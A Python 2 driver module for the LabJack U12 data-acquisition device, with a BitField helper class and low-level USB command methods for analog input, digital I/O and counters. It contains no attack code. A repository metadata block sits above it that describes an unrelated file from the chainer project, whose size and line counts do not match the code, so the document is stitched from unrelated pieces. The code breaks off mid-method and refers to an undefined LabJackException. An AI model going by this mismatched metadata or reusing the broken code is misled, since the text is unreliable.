"timestamp": "",
"source": "github",
"line_count": 34,
"max_line_length": 78,
"avg_line_length": 41.14705882352941,
"alnum_prop": 0.5975696926375983,
"repo_name": "hvy/chainer",
"id": "c3407f3dbb6b75515106b4447daf5c490f7e11bf",
"size": "1399",
"binary": false,
"copies": "4",
"ref": "refs/heads/master",
"path": "chainermn/communicators/flat_communicator.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Batchfile",
"bytes": "3796"
},
{
"name": "C",
"bytes": "1099"
},
{
"name": "C++",
"bytes": "1688016"
},
{
"name": "CMake",
"bytes": "51351"
},
{
"name": "Cuda",
"bytes": "191633"
},
{
"name": "Dockerfile",
"bytes": "6423"
},
{
"name": "PowerShell",
"bytes": "7197"
},
{
"name": "Python",
"bytes": "6425409"
},
{
"name": "Shell",
"bytes": "50581"
}
],
"symlink_target": ""
} |
"""
Name: u12.py
Desc: Defines the U12 class, which makes working with a U12 much easier. The
functions of the U12 class are divided into two categories: UW and
low-level.
Most of the UW functions are exposed as functions of the U12 class. With
the exception of the "e" functions, UW functions are Windows only. The "e"
functions will work with both the UW and the Exodriver. Therefore, people
wishing to write cross-platform code should restrict themselves to using
only the "e" functions. The UW functions are described in Section 4 of the
U12 User's Guide:
http://labjack.com/support/u12/users-guide/4
All low-level functions of the U12 class begin with the word
raw. For example, the low-level function Counter can be called with
U12.rawCounter(). Currently, low-level functions are limited to the
Exodriver (Linux and Mac OS X). You can find descriptions of the low-level
functions in Section 5 of the U12 User's Guide:
http://labjack.com/support/u12/users-guide/5
"""
import platform
import ctypes
import os, atexit
import math
from time import time
import struct
WINDOWS = "Windows"
ON_WINDOWS = (os.name == 'nt')
class U12Exception(Exception):
    """Exception type raised for U12-specific errors.

    Raised with either a LabJackUD error code or -1; -1 indicates an
    error originating in this Python wrapper rather than in the driver.
    """
    pass
class BitField(object):
    """
    Provides a method for working with bit fields.

    >>> bf = BitField()
    >>> print bf
    [ bit7 = 0, bit6 = 0, bit5 = 0, bit4 = 0, bit3 = 0, bit2 = 0, bit1 = 0, bit0 = 0 ]

    You can use attribute accessing for easy bit flipping:
    >>> bf.bit4 = 1
    >>> bf.bit7 = 1
    >>> print bf
    [ bit7 = 1, bit6 = 0, bit5 = 0, bit4 = 1, bit3 = 0, bit2 = 0, bit1 = 0, bit0 = 0 ]

    You can also use list-style accessing. Counting starts on the left:
    >>> print bf[0] # List index 0 is bit7
    1
    >>> print bf[3] # List index 3 is bit4
    1

    List-style slicing:
    >>> print bf[3:]
    [1, 0, 0, 0, 0]

    List-style setting bits works as you would expect:
    >>> bf[1] = 1
    >>> print bf
    [ bit7 = 1, bit6 = 1, bit5 = 0, bit4 = 1, bit3 = 0, bit2 = 0, bit1 = 0, bit0 = 0 ]

    It provides methods for going to and from bytes:
    >>> bf = BitField(123)
    >>> print bf
    [ bit7 = 0, bit6 = 1, bit5 = 1, bit4 = 1, bit3 = 1, bit2 = 0, bit1 = 1, bit0 = 1 ]
    >>> bf = BitField()
    >>> bf.fromByte(123) # Modifies bf in place
    >>> print bf
    [ bit7 = 0, bit6 = 1, bit5 = 1, bit4 = 1, bit3 = 1, bit2 = 0, bit1 = 1, bit0 = 1 ]
    >>> bf.bit4 = 0
    >>> print bf.asByte()
    107

    You can iterate of the raw bits ( 1 and 0 Vs. '1' and '0') easily:
    >>> for i in bf:
    ...     print i
    0
    1
    1
    0
    1
    0
    1
    1

    You can also iterate over the labels and their data values using items():
    >>> for label, data in bf.items():
    ...     print label, data
    bit7 0
    bit6 1
    bit5 1
    bit4 0
    bit3 1
    bit2 0
    bit1 1
    bit0 1

    As an added bonus, it can also be cast as an int or hex:
    >>> int(bf)
    107
    >>> hex(bf)
    '0x6b'

    See the description of the __init__ method for setting the label parameters. """

    def __init__(self, rawByte = None, labelPrefix = "bit", labelList = None, zeroLabel = "0", oneLabel = "1"):
        """
        Name: BitField.__init__(rawByte = None, labelPrefix = "bit",
                                labelList = None, zeroLabel = "0",
                                oneLabel = "1")
        Args: rawByte, a value to set the bit field values to.
              labelPrefix, what should go before the labels in labelList
              labelList, a list of labels to apply to each bit. If None, it
                         gets set to range(7,-1,-1).
              zeroLabel, bits with a value of 0 will have this label
              oneLabel, bits with a value of 1 will have this label
        Desc: Creates a new bitfield and sets up the labels.

        With out any arguments, you get a bit field that looks like this:
        >>> bf = BitField()
        >>> print bf
        [ bit7 = 0, bit6 = 0, bit5 = 0, bit4 = 0, bit3 = 0, bit2 = 0, bit1 = 0,
          bit0 = 0 ]

        To make the labels, it iterates over all the labelList and adds the
        labelPrefix to them. If you have less than 8 labels, then your bit field
        will only work up to that many bits.

        To make a BitField with labels for FIO0-7 you can do the following:
        >>> bf = BitField(labelPrefix = "FIO")
        >>> print bf
        [ FIO7 = 0, FIO6 = 0, FIO5 = 0, FIO4 = 0, FIO3 = 0, FIO2 = 0, FIO1 = 0,
          FIO0 = 0 ]

        The labels don't have to be numbers, for example:
        >>> names = [ "Goodreau", "Jerri", "Selena", "Allan", "Tania",
                      "Kathrine", "Jessie", "Zelma" ]
        >>> bf = BitField( labelPrefix = "", labelList = names)
        >>> print bf
        [ Goodreau = 0, Jerri = 0, Selena = 0, Allan = 0, Tania = 0,
          Kathrine = 0, Jessie = 0, Zelma = 0 ]

        You can change the display value of zero and one to be whatever you
        want. For example, if you have a BitField that represents FIO0-7
        directions:
        >>> dirs = BitField(rawByte = 5, labelPrefix = "FIO",
                            zeroLabel = "Output", oneLabel = "Input")
        >>> print dirs
        [ FIO7 = Output, FIO6 = Output, FIO5 = Output, FIO4 = Output,
          FIO3 = Output, FIO2 = Input, FIO1 = Output, FIO0 = Input ]

        Note, that when you access the value, you will get 1 or 0, not "Input"
        or "Output. For example:
        >>> print dirs.FIO3
        0
        """
        # Do labels first, so that self.something = something works.
        # NOTE: 'labels' must be injected through __dict__ directly because
        # __setattr__ (below) consults self.labels, which doesn't exist yet.
        self.__dict__['labels'] = []
        self.labelPrefix = labelPrefix
        if labelList is None:
            self.labelList = range(8)
        else:
            # Reversed so that list index 0 corresponds to the MSB label.
            self.labelList = list(reversed(labelList))
        self.zeroLabel = zeroLabel
        self.oneLabel = oneLabel
        self.rawValue = 0
        self.rawBits = [ 0 ] * 8
        self.data = [ self.zeroLabel ] * 8
        # At most 8 labels are usable; fewer labels mean fewer usable bits.
        items = min(8, len(self.labelList))
        for i in reversed(range(items)):
            self.labels.append("%s%s" % (self.labelPrefix, self.labelList[i]))
        if rawByte is not None:
            self.fromByte(rawByte)

    def fromByte(self, raw):
        """
        Name: BitField.fromByte(raw)
        Args: raw, the raw byte to make the BitField.
        Desc: Takes a byte, and modifies self to match.

        >>> bf = BitField()
        >>> bf.fromByte(123) # Modifies bf in place
        >>> print bf
        [ bit7 = 0, bit6 = 1, bit5 = 1, bit4 = 1, bit3 = 1, bit2 = 0, bit1 = 1,
          bit0 = 1 ]
        """
        self.rawValue = raw
        self.rawBits = []
        self.data = []
        items = min(8, len(self.labelList))
        # Walk bits MSB-first so rawBits[0] is the highest usable bit.
        for i in reversed(range(items)):
            self.rawBits.append( ((raw >> (i)) & 1) )
            self.data.append(self.oneLabel if bool(((raw >> (i)) & 1)) else self.zeroLabel)

    def asByte(self):
        """
        Name: BitField.asByte()
        Args: None
        Desc: Returns the value of the bitfield as a byte.

        >>> bf = BitField()
        >>> bf.fromByte(123) # Modifies bf in place
        >>> bf.bit4 = 0
        >>> print bf.asByte()
        107
        """
        byteVal = 0
        # rawBits is MSB-first, so reverse before weighting by 2**i.
        for i, v in enumerate(reversed(self.rawBits)):
            byteVal += ( 1 << i ) * v
        return byteVal

    def asBin(self):
        # Binary-literal style string, e.g. "0b01101011" (MSB first).
        result = "0b"
        for i in self.rawBits:
            result += "%s" % i
        return result

    def __len__(self):
        return len(self.data)

    def __repr__(self):
        result = "["
        for i in range(len(self.data)):
            result += " %s = %s (%s)," % (self.labels[i], self.data[i], self.rawBits[i])
        result = result.rstrip(',')
        result += " ]"
        return "<BitField object: %s >" % result

    def __str__(self):
        result = "["
        for i in range(len(self.data)):
            result += " %s = %s," % (self.labels[i], self.data[i])
        result = result.rstrip(',')
        result += " ]"
        return result

    def __getattr__(self, label):
        # Known bit labels resolve to their raw bit value (0 or 1);
        # anything else is a genuine missing attribute.
        try:
            i = self.labels.index(label)
            return self.rawBits[i]
        except ValueError:
            raise AttributeError(label)

    def __setattr__(self, label, value):
        # Assigning to a known bit label flips that bit; any other name is
        # stored as a plain instance attribute.
        try:
            i = self.labels.index(label)
            self.rawBits[i] = int(bool(value))
            self.data[i] = self.oneLabel if bool(value) else self.zeroLabel
        except ValueError:
            self.__dict__[label] = value

    def __getitem__(self, key):
        return self.rawBits[key]

    def __setitem__(self, key, value):
        self.rawBits[key] = int(bool(value))
        self.data[key] = self.oneLabel if bool(value) else self.zeroLabel

    def __iter__(self):
        return iter(self.rawBits)

    def items(self):
        """
        Name: BitField.items()
        Args: None
        Desc: Returns a list of tuples where the first item is the label and the
              second is the string value, like "High" or "Input"

        >>> dirs = BitField(rawByte = 5, labelPrefix = "FIO",
                            zeroLabel = "Output", oneLabel = "Input")
        >>> print dirs
        [ FIO7 = Output, FIO6 = Output, FIO5 = Output, FIO4 = Output,
          FIO3 = Output, FIO2 = Input, FIO1 = Output, FIO0 = Input ]
        >>> for label, data in dirs.items():
        ...     print label, data
        ...
        FIO7 Output
        FIO6 Output
        FIO5 Output
        FIO4 Output
        FIO3 Output
        FIO2 Input
        FIO1 Output
        FIO0 Input
        """
        return zip(self.labels, self.data)

    def __int__(self):
        return self.asByte()

    def __hex__(self):
        return hex(self.asByte())

    def __add__(self, other):
        """
        A helper to prevent having to test if a variable is a bitfield or int.
        """
        return other + self.asByte()
def errcheck(ret, func, args):
    """ctypes errcheck hook: pass non-negative results through, raise
    U12Exception (with errno where available) when the driver returns -1."""
    if ret != -1:
        return ret
    try:
        errno = ctypes.get_errno()
    except AttributeError:
        # ctypes.get_errno() appeared in Python 2.6.
        raise U12Exception("Exodriver returned an error, but LabJackPython is unable to read the error code. Upgrade to Python 2.6 for this functionality.")
    raise U12Exception("Exodriver returned error number %s" % errno)
def _loadLinuxSo():
    """Load the Exodriver shared object on Linux and attach error checks
    to the calls that report failure via a -1 return value."""
    try:
        lib = ctypes.CDLL("liblabjackusb.so", use_errno=True)
    except TypeError:
        # Older ctypes (pre-2.6) has no use_errno keyword.
        lib = ctypes.CDLL("liblabjackusb.so")
    lib.LJUSB_Stream.errcheck = errcheck
    lib.LJUSB_Read.errcheck = errcheck
    return lib
def _loadMacDylib():
    """Load the Exodriver dylib on Mac OS X and attach error checks
    to the calls that report failure via a -1 return value."""
    try:
        lib = ctypes.CDLL("liblabjackusb.dylib", use_errno=True)
    except TypeError:
        # Older ctypes (pre-2.6) has no use_errno keyword.
        lib = ctypes.CDLL("liblabjackusb.dylib")
    lib.LJUSB_Stream.errcheck = errcheck
    lib.LJUSB_Read.errcheck = errcheck
    return lib
# Load the native driver: on POSIX try the Linux .so, then fall back to the
# Mac dylib; on Windows use the LabJack UW driver (ljackuw) instead.
staticLib = None
if os.name == 'posix':
    try:
        staticLib = _loadLinuxSo()
    except OSError, e:
        pass # We may be on Mac.
    except Exception, e:
        # The .so exists but failed to load for another reason -- fatal.
        raise U12Exception("Could not load the Linux SO for some reason other than it not being installed. Ethernet connectivity only.\n\n    The error was: %s" % e)
    try:
        if staticLib is None:
            # Linux load failed with OSError, so try the Mac dylib.
            staticLib = _loadMacDylib()
    except OSError, e:
        raise U12Exception("Could not load the Exodriver driver. Ethernet connectivity only.\n\nCheck that the Exodriver is installed, and the permissions are set correctly.\nThe error message was: %s" % e)
    except Exception, e:
        raise U12Exception("Could not load the Mac Dylib for some reason other than it not being installed. Ethernet connectivity only.\n\n    The error was: %s" % e)
else:
    try:
        staticLib = ctypes.windll.LoadLibrary("ljackuw")
    except:
        raise Exception, "Could not load LabJack UW driver."
class U12(object):
"""
U12 Class for all U12 specific commands.
u12 = U12()
"""
def __init__(self, id = -1, serialNumber = None, debug = False):
    """Set up bookkeeping state, then open the device.

    Args:
        id: local ID of the U12 to open, or -1 for the first one found.
        serialNumber: open the U12 with this serial number instead.
        debug: when True, print every packet written to / read from USB.
    """
    self.id = id
    self.serialNumber = serialNumber
    self.debug = debug
    self.deviceName = "U12"
    self.handle = None
    self.streaming = False
    self._autoCloseSetup = False
    if not ON_WINDOWS:
        # Save some variables to save state: the Exodriver keeps no PWM
        # state between calls, so remember the last output voltages here.
        self.pwmAVoltage = 0
        self.pwmBVoltage = 0
    self.open(id, serialNumber)
def open(self, id = -1, serialNumber = None):
    """
    Opens the U12.

    The Windows UW driver opens the device every time a function is called.
    The Exodriver, however, works like the UD family of devices and returns
    a handle. On Windows, this method does nothing. On Mac OS X and Linux,
    this method acquires a device handle and saves it to the U12 object.
    """
    if ON_WINDOWS:
        pass
    else:
        if self.debug: print "open called"
        devType = ctypes.c_ulong(1)
        openDev = staticLib.LJUSB_OpenDevice
        openDev.restype = ctypes.c_void_p
        if serialNumber is not None:
            # Enumerate every connected U12 until the serial number matches.
            numDevices = staticLib.LJUSB_GetDevCount(devType)
            for i in range(numDevices):
                handle = openDev(i+1, 0, devType)
                if handle != 0 and handle is not None:
                    self.handle = ctypes.c_void_p(handle)
                    try:
                        serial = self.rawReadSerial()
                    except Exception:
                        # The U12 ignores its first command after opening;
                        # retry once on failure.
                        serial = self.rawReadSerial()
                    if serial == int(serialNumber):
                        break
                    else:
                        self.close()
            if self.handle is None:
                raise U12Exception("Couldn't find a U12 with a serial number matching %s" % serialNumber)
        elif id != -1:
            # Enumerate every connected U12 until the local ID matches.
            numDevices = staticLib.LJUSB_GetDevCount(devType)
            for i in range(numDevices):
                handle = openDev(i+1, 0, devType)
                if handle != 0 and handle is not None:
                    self.handle = ctypes.c_void_p(handle)
                    try:
                        unitId = self.rawReadLocalId()
                    except Exception:
                        # Retry once; see the serial-number branch above.
                        unitId = self.rawReadLocalId()
                    if unitId == int(id):
                        break
                    else:
                        self.close()
            if self.handle is None:
                raise U12Exception("Couldn't find a U12 with a local ID matching %s" % id)
        elif id == -1:
            # No selector given: open the first U12 found.
            handle = openDev(1, 0, devType)
            if handle == 0 or handle is None:
                raise Exception("Couldn't open a U12. Check that one is connected and try again.")
            else:
                self.handle = ctypes.c_void_p(handle)
                # U12 ignores first command, so let's write a command.
                command = [ 0 ] * 8
                command[5] = 0x57 # 0b01010111
                try:
                    self.write(command)
                    self.read()
                except:
                    pass
                self.id = self.rawReadLocalId()
        else:
            raise Exception("Invalid combination of parameters.")
        if not self._autoCloseSetup:
            # Only need to register auto-close once per device.
            atexit.register(self.close)
            self._autoCloseSetup = True
def close(self):
    """Release the USB handle. No-op on Windows, where the UW driver
    opens and closes the device around every call."""
    if ON_WINDOWS:
        return
    staticLib.LJUSB_CloseDevice(self.handle)
    self.handle = None
def write(self, writeBuffer):
if ON_WINDOWS:
pass
else:
if self.handle is None:
raise U12Exception("The U12's handle is None. Please open a U12 with open()")
if self.debug: print "Writing:", hexWithoutQuotes(writeBuffer)
newA = (ctypes.c_byte*len(writeBuffer))(0)
for i in range(len(writeBuffer)):
newA[i] = ctypes.c_byte(writeBuffer[i])
writeBytes = staticLib.LJUSB_Write(self.handle, ctypes.byref(newA), len(writeBuffer))
if(writeBytes != len(writeBuffer)):
raise LabJackException( "Could only write %s of %s bytes." % (writeBytes, len(writeBuffer) ) )
return writeBuffer
def read(self, numBytes = 8):
if ON_WINDOWS:
pass
else:
if self.handle is None:
raise U12Exception("The U12's handle is None. Please open a U12 with open()")
newA = (ctypes.c_byte*numBytes)()
readBytes = staticLib.LJUSB_Read(self.handle, ctypes.byref(newA), numBytes)
# return a list of integers in command/response mode
result = [(newA[i] & 0xff) for i in range(readBytes)]
if self.debug: print "Received:", hexWithoutQuotes(result)
return result
# Low-level helpers
def rawReadSerial(self):
    """
    Name: U12.rawReadSerial()
    Args: None
    Desc: Reads the serial number from internal memory.

    Returns: The U12's serial number as an integer.

    Example:
    >>> import u12
    >>> d = u12.U12()
    >>> print d.rawReadSerial()
    10004XXXX
    """
    ram = self.rawReadRAM()
    # The serial number lives in RAM bytes 3..0, most significant first.
    packed = struct.pack("BBBB", ram['DataByte3'], ram['DataByte2'], ram['DataByte1'], ram['DataByte0'])
    (serial,) = struct.unpack(">I", packed)
    return serial
def rawReadLocalId(self):
    """
    Name: U12.rawReadLocalId()
    Args: None
    Desc: Reads the Local ID from internal memory.

    Returns: The U12's Local ID as an integer.

    Example:
    >>> import u12
    >>> d = u12.U12()
    >>> print d.rawReadLocalId()
    0
    """
    # The Local ID is the single byte at RAM address 0x08.
    ram = self.rawReadRAM(0x08)
    return ram['DataByte0']
# Begin Section 5 Functions
def rawAISample(self, channel0PGAMUX = 8, channel1PGAMUX = 9, channel2PGAMUX = 10, channel3PGAMUX = 11, UpdateIO = False, LEDState = True, IO3toIO0States = 0, EchoValue = 0):
    """
    Name: U12.rawAISample(channel0PGAMUX = 8, channel1PGAMUX = 9,
                          channel2PGAMUX = 10, channel3PGAMUX = 11,
                          UpdateIO = False, LEDState = True,
                          IO3toIO0States = 0, EchoValue = 0)
    Args: channel0PGAMUX, A byte that contains channel0 information
          channel1PGAMUX, A byte that contains channel1 information
          channel2PGAMUX, A byte that contains channel2 information
          channel3PGAMUX, A byte that contains channel3 information
          IO3toIO0States, A byte that represents the states of IO0 to IO3
          UpdateIO, If true, set IO0 to IO 3 to match IO3toIO0States
          LEDState, Turns the status LED on or off.
          EchoValue, Sometimes, you want what you put in.
    Desc: Collects readings from 4 analog inputs. It can also toggle the
          status LED and update the state of the IOs. See Section 5.1 of
          the User's Guide.
          By default it will read AI0-3 (single-ended).

    Returns: A dictionary with the following keys:
        PGAOvervoltage, A bool representing if the U12 detected overvoltage
        IO3toIO0States, a BitField representing the state of IO0 to IO3
        Channel0-3, the analog voltage for the channel
        EchoValue, a repeat of the value passed in.

    Example:
    >>> import u12
    >>> d = u12.U12()
    >>> d.rawAISample()
    {
      'IO3toIO0States':
          <BitField object: [ IO3 = Low (0), IO2 = Low (0),
                              IO1 = Low (0), IO0 = Low (0) ] >,
      'Channel0': 1.46484375,
      'Channel1': 1.4501953125,
      'Channel2': 1.4599609375,
      'Channel3': 1.4306640625,
      'PGAOvervoltage': False,
      'EchoValue': 0
    }
    """
    command = [ 0 ] * 8
    # Bits 6-4: PGA for 1st Channel
    # Bits 3-0: MUX command for 1st Channel
    command[0] = int(channel0PGAMUX)
    # Decode the channel number and gain back out of each PGAMUX byte so
    # the raw readings can be converted to volts at the end.
    tempNum = command[0] & 7 # 7 = 0b111
    channel0Number = tempNum if (command[0] & 0xf) > 7 else tempNum+8
    channel0Gain = (command[0] >> 4) & 7 # 7 = 0b111
    command[1] = int(channel1PGAMUX)
    tempNum = command[1] & 7 # 7 = 0b111
    channel1Number = tempNum if (command[1] & 0xf) > 7 else tempNum+8
    channel1Gain = (command[1] >> 4) & 7 # 7 = 0b111
    command[2] = int(channel2PGAMUX)
    tempNum = command[2] & 7 # 7 = 0b111
    channel2Number = tempNum if (command[2] & 0xf) > 7 else tempNum+8
    channel2Gain = (command[2] >> 4) & 7 # 7 = 0b111
    command[3] = int(channel3PGAMUX)
    tempNum = command[3] & 7 # 7 = 0b111
    channel3Number = tempNum if (command[3] & 0xf) > 7 else tempNum+8
    channel3Gain = (command[3] >> 4) & 7 # 7 = 0b111
    # Bit 1: Update IO
    # Bit 0: LED State
    bf = BitField()
    bf.bit1 = int(UpdateIO)
    bf.bit0 = int(LEDState)
    command[4] = int(bf)
    # Bit 7-4: 1100 (Command/Response)
    # Bit 3-0: Bits for IO3 through IO0 States
    bf.fromByte(0)
    bf.bit7 = 1
    bf.bit6 = 1
    bf.fromByte( int(bf) | int(IO3toIO0States) )
    command[5] = int(bf)
    command[7] = EchoValue
    self.write(command)
    results = self.read()
    # Response byte 0: bit7 must be 1 and bit6 must be 0 for AISample.
    bf = BitField()
    bf.fromByte(results[0])
    if bf.bit7 != 1 or bf.bit6 != 0:
        raise U12Exception("Expected a AIStream response, got %s instead." % results[0])
    returnDict = {}
    returnDict['EchoValue'] = results[1]
    returnDict['PGAOvervoltage'] = bool(bf.bit4)
    # IO states come back in the low nibble of response byte 0.
    returnDict['IO3toIO0States'] = BitField(results[0], "IO", range(3, -1, -1), "Low", "High")
    # Each reading is 12 bits: the four high nibbles are packed two-per-byte
    # in response bytes 2 and 5; the low bytes follow individually.
    channel0 = (results[2] >> 4) & 0xf
    channel1 = (results[2] & 0xf)
    channel2 = (results[5] >> 4) & 0xf
    channel3 = (results[5] & 0xf)
    channel0 = (channel0 << 8) + results[3]
    returnDict['Channel0'] = self.bitsToVolts(channel0Number, channel0Gain, channel0)
    channel1 = (channel1 << 8) + results[4]
    returnDict['Channel1'] = self.bitsToVolts(channel1Number, channel1Gain, channel1)
    channel2 = (channel2 << 8) + results[6]
    returnDict['Channel2'] = self.bitsToVolts(channel2Number, channel2Gain, channel2)
    channel3 = (channel3 << 8) + results[7]
    returnDict['Channel3'] = self.bitsToVolts(channel3Number, channel3Gain, channel3)
    return returnDict
def rawDIO(self, D15toD8Directions = 0, D7toD0Directions = 0, D15toD8States = 0, D7toD0States = 0, IO3toIO0DirectionsAndStates = 0, UpdateDigital = False):
    """
    Name: U12.rawDIO(D15toD8Directions = 0, D7toD0Directions = 0,
                     D15toD8States = 0, D7toD0States = 0,
                     IO3toIO0DirectionsAndStates = 0, UpdateDigital = 1)
    Args: D15toD8Directions, A byte where 0 = Output, 1 = Input for D15-8
          D7toD0Directions, A byte where 0 = Output, 1 = Input for D7-0
          D15toD8States, A byte where 0 = Low, 1 = High for D15-8
          D7toD0States, A byte where 0 = Low, 1 = High for D7-0
          IO3toIO0DirectionsAndStates, Bits 7-4: Direction, 3-0: State
          UpdateDigital, True if you want to update the IO/D line. False to
                         False to just read their values.
    Desc: This commands reads the direction and state of all the digital
          I/O. See Section 5.2 of the U12 User's Guide.
          By default, it just reads the directions and states.

    Returns: A dictionary with the following keys:
        D15toD8Directions, a BitField representing the directions of D15-D8
        D7toD0Directions, a BitField representing the directions of D7-D0.
        D15toD8States, a BitField representing the states of D15-D8.
        D7toD0States, a BitField representing the states of D7-D0.
        IO3toIO0States, a BitField representing the states of IO3-IO0.
        D15toD8OutputLatchStates, BitField of output latch states for D15-8
        D7toD0OutputLatchStates, BitField of output latch states for D7-0

    Example:
    >>> import u12
    >>> d = u12.U12()
    >>> d.rawDIO()
    {
      'D15toD8Directions':
          <BitField object: [ D15 = Input (1), D14 = Input (1),
                              D13 = Input (1), D12 = Input (1),
                              D11 = Input (1), D10 = Input (1),
                              D9 = Input (1), D8 = Input (1) ] >,
      'D7toD0Directions':
          <BitField object: [ D7 = Input (1), D6 = Input (1), D5 = Input (1),
                              D4 = Input (1), D3 = Input (1), D2 = Input (1),
                              D1 = Input (1), D0 = Input (1) ] >,
      'D15toD8States':
          <BitField object: [ D15 = Low (0), D14 = Low (0), D13 = Low (0),
                              D12 = Low (0), D11 = Low (0), D10 = Low (0),
                              D9 = Low (0), D8 = Low (0) ] >,
      'D7toD0States':
          <BitField object: [ D7 = Low (0), D6 = Low (0), D5 = Low (0),
                              D4 = Low (0), D3 = Low (0), D2 = Low (0),
                              D1 = Low (0), D0 = Low (0) ] >,
      'IO3toIO0States':
          <BitField object: [ IO3 = Low (0), IO2 = Low (0), IO1 = Low (0),
                              IO0 = Low (0) ] >,
      'D15toD8OutputLatchStates':
          <BitField object: [ D15 = 0 (0), D14 = 0 (0), D13 = 0 (0),
                              D12 = 0 (0), D11 = 0 (0), D10 = 0 (0),
                              D9 = 0 (0), D8 = 0 (0) ] >,
      'D7toD0OutputLatchStates':
          <BitField object: [ D7 = 0 (0), D6 = 0 (0), D5 = 0 (0), D4 = 0 (0),
                              D3 = 0 (0), D2 = 0 (0), D1 = 0 (0),
                              D0 = 0 (0) ] >
    }
    """
    command = [ 0 ] * 8
    # Bits for D15 through D8 Direction
    command[0] = int(D15toD8Directions)
    # Bits for D7 through D0 Direction ( 0 = Output, 1 = Input)
    command[1] = int(D7toD0Directions)
    # Bits for D15 through D8 State ( 0 = Low, 1 = High)
    command[2] = int(D15toD8States)
    # Bits for D7 through D0 State ( 0 = Low, 1 = High)
    command[3] = int(D7toD0States)
    # Bits 7-4: Bits for IO3 through IO0 Direction
    # Bits 3-0: Bits for IO3 through IO0 State
    command[4] = int(IO3toIO0DirectionsAndStates)
    # 01X10111 (DIO)
    command[5] = 0x57 # 0b01010111
    # Bit 0: Update Digital
    command[6] = int(bool(UpdateDigital))
    #XXXXXXXX
    # command[7] = XXXXXXXX
    self.write(command)
    results = self.read()
    returnDict = {}
    # The device echoes the DIO command byte (0x57 == 87) in byte 0.
    if results[0] != 87:
        raise U12Exception("Expected a DIO response, got %s instead." % results[0])
    returnDict['D15toD8States'] = BitField(results[1], "D", range(15, 7, -1), "Low", "High")
    returnDict['D7toD0States'] = BitField(results[2], "D", range(7, -1, -1), "Low", "High")
    returnDict['D15toD8Directions'] = BitField(results[4], "D", range(15, 7, -1), "Output", "Input")
    returnDict['D7toD0Directions'] = BitField(results[5], "D", range(7, -1, -1), "Output", "Input")
    returnDict['D15toD8OutputLatchStates'] = BitField(results[6], "D", range(15, 7, -1))
    returnDict['D7toD0OutputLatchStates'] = BitField(results[7], "D", range(7, -1, -1))
    # IO states arrive in the high nibble of response byte 3.
    returnDict['IO3toIO0States'] = BitField((results[3] >> 4), "IO", range(3, -1, -1), "Low", "High")
    return returnDict
def rawCounter(self, StrobeEnabled = False, ResetCounter = False):
    """
    Name: U12.rawCounter(StrobeEnabled = False, ResetCounter = False)
    Args: StrobeEnable, set to True to enable strobe.
          ResetCounter, set to True to reset the counter AFTER reading.
    Desc: This command controls and reads the 32-bit counter. See
          Section 5.3 of the User's Guide.

    Returns: A dictionary with the following keys:
        D15toD8States, a BitField representing the states of D15-D8.
        D7toD0States, a BitField representing the states of D7-D0.
        IO3toIO0States, a BitField representing the states of IO3-IO0.
        Counter, the value of the counter
    """
    command = [ 0 ] * 8
    # Byte 0, bit 1: strobe enable; bit 0: reset-after-read.
    control = BitField()
    control.bit1 = int(StrobeEnabled)
    control.bit0 = int(ResetCounter)
    command[0] = int(control)
    # Byte 5 is the Counter command code (bits 6, 4 and 1 set).
    control.fromByte(0)
    control.bit6 = 1
    control.bit4 = 1
    control.bit1 = 1
    command[5] = int(control)
    self.write(command)
    results = self.read()
    # The device echoes the command byte back in byte 0.
    if results[0] != command[5]:
        raise U12Exception("Expected a Counter response, got %s instead." % results[0])
    returnDict = {}
    returnDict['D15toD8States'] = BitField(results[1], "D", range(15, 7, -1), "Low", "High")
    returnDict['D7toD0States'] = BitField(results[2], "D", range(7, -1, -1), "Low", "High")
    returnDict['IO3toIO0States'] = BitField((results[3] >> 4), "IO", range(3, -1, -1), "Low", "High")
    # Counter is a 32-bit big-endian value in response bytes 4-7
    # (read() masks each byte to 0-255, so OR-ing equals adding).
    returnDict['Counter'] = (results[4] << 24) | (results[5] << 16) | (results[6] << 8) | results[7]
    return returnDict
def rawCounterPWMDIO(self, D15toD8Directions = 0, D7toD0Directions = 0, D15toD8States = 0, D7toD0States = 0, IO3toIO0DirectionsAndStates = 0, ResetCounter = False, UpdateDigital = 0, PWMA = 0, PWMB = 0):
    """
    Name: U12.rawCounterPWMDIO( D15toD8Directions = 0, D7toD0Directions = 0,
                                D15toD8States = 0, D7toD0States = 0,
                                IO3toIO0DirectionsAndStates = 0,
                                ResetCounter = False, UpdateDigital = 0,
                                PWMA = 0, PWMB = 0)
    Args: D15toD8Directions, A byte where 0 = Output, 1 = Input for D15-8
          D7toD0Directions, A byte where 0 = Output, 1 = Input for D7-0
          D15toD8States, A byte where 0 = Low, 1 = High for D15-8
          D7toD0States, A byte where 0 = Low, 1 = High for D7-0
          IO3toIO0DirectionsAndStates, Bits 7-4: Direction, 3-0: State
          ResetCounter, If True, reset the counter after reading.
          UpdateDigital, True if you want to update the IO/D line. False to
                         False to just read their values.
          PWMA, Voltage to set AO0 to output.
          PWMB, Voltage to set AO1 to output.
    Desc: This command controls all 20 digital I/O, and the 2 PWM outputs.
          The response provides the state of all I/O and the current count.
          See Section 5.4 of the User's Guide.
          By default, sets the AOs to 0 and reads the states and counters.

    Returns: A dictionary with the following keys:
        D15toD8States, a BitField representing the states of D15-D8.
        D7toD0States, a BitField representing the states of D7-D0.
        IO3toIO0States, a BitField representing the states of IO3-IO0.
        Counter, the value of the counter
    """
    command = [ 0 ] * 8
    # Bits for D15 through D8 Direction
    command[0] = int(D15toD8Directions)
    # Bits for D7 through D0 Direction ( 0 = Output, 1 = Input)
    command[1] = int(D7toD0Directions)
    # Bits for D15 through D8 State ( 0 = Low, 1 = High)
    command[2] = int(D15toD8States)
    # Bits for D7 through D0 State ( 0 = Low, 1 = High)
    command[3] = int(D7toD0States)
    # Bits 7-4: Bits for IO3 through IO0 Direction
    # Bits 3-0: Bits for IO3 through IO0 State
    command[4] = int(IO3toIO0DirectionsAndStates)
    bf = BitField()
    bf.bit5 = int(ResetCounter)
    bf.bit4 = int(UpdateDigital)
    # Convert the requested PWM voltages (0-5 V) to 10-bit DAC codes.
    binPWMA = int((1023 * (float(PWMA)/5.0)))
    binPWMB = int((1023 * (float(PWMB)/5.0)))
    # The two low bits of each 10-bit code ride along in command byte 5;
    # the high 8 bits go in bytes 6 (PWMA) and 7 (PWMB).
    bf2 = BitField()
    bf2.fromByte( binPWMA & 3 ) # 3 = 0b11
    bf.bit3 = bf2.bit1
    bf.bit2 = bf2.bit0
    bf2.fromByte( binPWMB & 3 ) # 3 = 0b11
    bf.bit1 = bf2.bit1
    bf.bit0 = bf2.bit0
    command[5] = int(bf)
